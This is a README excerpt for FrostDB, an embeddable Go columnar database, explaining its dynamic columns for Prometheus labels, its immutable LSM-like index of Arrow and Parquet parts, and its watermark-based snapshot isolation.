Dynamic Columns While columnar databases already exist, most require a static schema. However, Observability workloads differ in that their schemas are not static, meaning not all columns are pre-defined. Wide-column databases already exist, but typically are not strictly typed (e.g. document databases), and most wide-column databases are row-based databases, not columnar databases. Take a Prometheus time-series for example. Prometheus time-series are uniquely identified by the combination of their label-sets: http_requests_total{path="/api/v1/users", code="200"} 12 This model does not map well into a static schema, as label-names cannot be known upfront. The most suitable data-type some columnar databases have to offer is a map; however, maps have the same problem as row-based databases, where all values of a map in a row are stored together, resulting in an inability to exploit the advantages of a columnar layout. A FrostDB schema can define a column to be dynamic, causing a column to be created on the fly when a new label-name is seen. A FrostDB schema for Prometheus could look like this: go type Prometheus struct { Labels map[string]string `frostdb:",rle_dict,asc(1),null_first"` Timestamp int64 `frostdb:",asc(0)"` Value float64 } Note: We are aware that Prometheus uses double-delta encoding for timestamps and XOR encoding for values. This schema is purely an example to highlight the dynamic columns feature. With this schema, all rows are expected to have a timestamp and a value but can vary in their columns prefixed with "labels.". In this schema all dynamically created columns are still Dictionary and run-length encoded and must be of type string . Immutable There are only writes and reads. All data is immutable. FrostDB maintains inserted data in a Log-structured merge-tree (LSM)-like index. This index is implemented as lists of Parts. A Part contains either an Arrow record or a Parquet file. The first level (L0) contains a list of Arrow records inserted as-is into the list. When a level reaches its maximum configured size, it is compacted into a single Parquet file and added to the next level of the index. This process continues for each configured level of the index until a file is written into the final level. When the entire index reaches the configured maximum in-memory size, the index is rotated out; it can be configured either to be dropped entirely or to be written out to your storage of choice. At query time FrostDB scans each Part in the index. To keep queries fast, FrostDB leverages the sparse-index features of Parquet files, such as bloom filters and the min and max values of columns in each row group, so that only the row groups containing data that can satisfy the query are processed. Snapshot isolation FrostDB has snapshot isolation; however, it comes with a few caveats that should be well understood. It does not have read-after-write consistency, as the intended use is for readers that are not the same entity as the writer. To see new data, the user re-runs a query. Choosing to trade off read-after-write consistency allows for mechanisms that increase throughput significantly. FrostDB releases write transactions in batches. It essentially only ensures write atomicity and that writes are not torn when reading. Since data is immutable, those characteristics together result in snapshot isolation. More concretely, FrostDB maintains a watermark indicating that all transactions equal to and lower than the watermark are safe to be read. Only write transactions obtain a new transaction ID, while reads use the transaction ID of the watermark to identify data that is safe to be read. The watermark is only increased when strictly monotonic, consecutive transactions have finished. This means that a low write transaction can block higher write transactions from becoming available to be read. 
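A minimal Go sketch of the watermark idea described above — purely illustrative, not FrostDB's actual implementation — shows why an out-of-order finish stalls readers until the gap closes (the timeout described next guards against a stalled writer):

```go
package main

import "fmt"

// watermark tracks the highest transaction ID that is safe to read.
type watermark struct {
	done map[uint64]bool // finished write transactions
	mark uint64          // all txns <= mark are readable
}

// finish marks a write transaction as completed and advances the
// watermark only across strictly consecutive finished transactions.
func (w *watermark) finish(tx uint64) {
	w.done[tx] = true
	for w.done[w.mark+1] {
		w.mark++
	}
}

func main() {
	w := &watermark{done: map[uint64]bool{}}
	w.finish(2)         // txn 2 finishes first...
	fmt.Println(w.mark) // 0 — readers see nothing yet: txn 1 is still pending
	w.finish(1)         // txn 1 closes the gap...
	fmt.Println(w.mark) // 2 — txns 1 and 2 are now readable
}
```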
To ensure progress is made, write transactions have a timeout. This mechanism is inspired by a mix of Google Spanner , Google Percolator and Highly Available Transactions . Acknowledgments FrostDB stands on the shoulders of giants. Shout out to Segment for creating the incredible parquet-go library, as well as to InfluxData for starting Go support for Apache Arrow and to the various contributors who have continued that work.;❄️ Coolest database around 🧊 Embeddable column database written in Go.;database,columnar-storage,apache-arrow,apache-parquet,golang
polarsignals/frostdb